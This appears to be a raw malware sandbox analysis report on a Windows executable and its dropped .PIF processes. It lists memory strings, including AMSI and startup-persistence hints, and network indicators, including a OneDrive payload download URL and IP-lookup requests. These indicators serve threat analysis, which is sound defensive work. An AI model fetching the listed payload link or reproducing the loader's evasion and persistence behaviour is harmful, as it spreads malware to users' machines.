anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
Source: veaiqniF.pif, 0000000A.00000001.1622599769.0000000000D90000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: Gone<>idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
Source: veaiqniF.pif, 0000000A.00000001.1622599769.0000000000400000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: Gone<>idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
Source: veaiqniF.pif, 0000000A.00000002.1900086210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Gone<>idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
Source: veaiqniF.pif, 0000000C.00000002.1945846450.0000000000D90000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Gone<>idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_0423BB38 InternetCheckConnectionA,

0_2_0423BB38

Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 13.107.137.11 13.107.137.11

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: checkip.amazonaws.com
Source: unknown	DNS query: name: checkip.amazonaws.com

Source: global traffic	HTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.ioUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.amazonaws.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.ioUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.amazonaws.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.ioUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.amazonaws.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1484946816.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1483689151.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1677400225.000000007FA0F000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1634357707.00000000041D6000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000002.1747949897.0000000004146000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: veaiqniF.pif, 00000007.00000003.1529994916.000000002F746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftq#
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
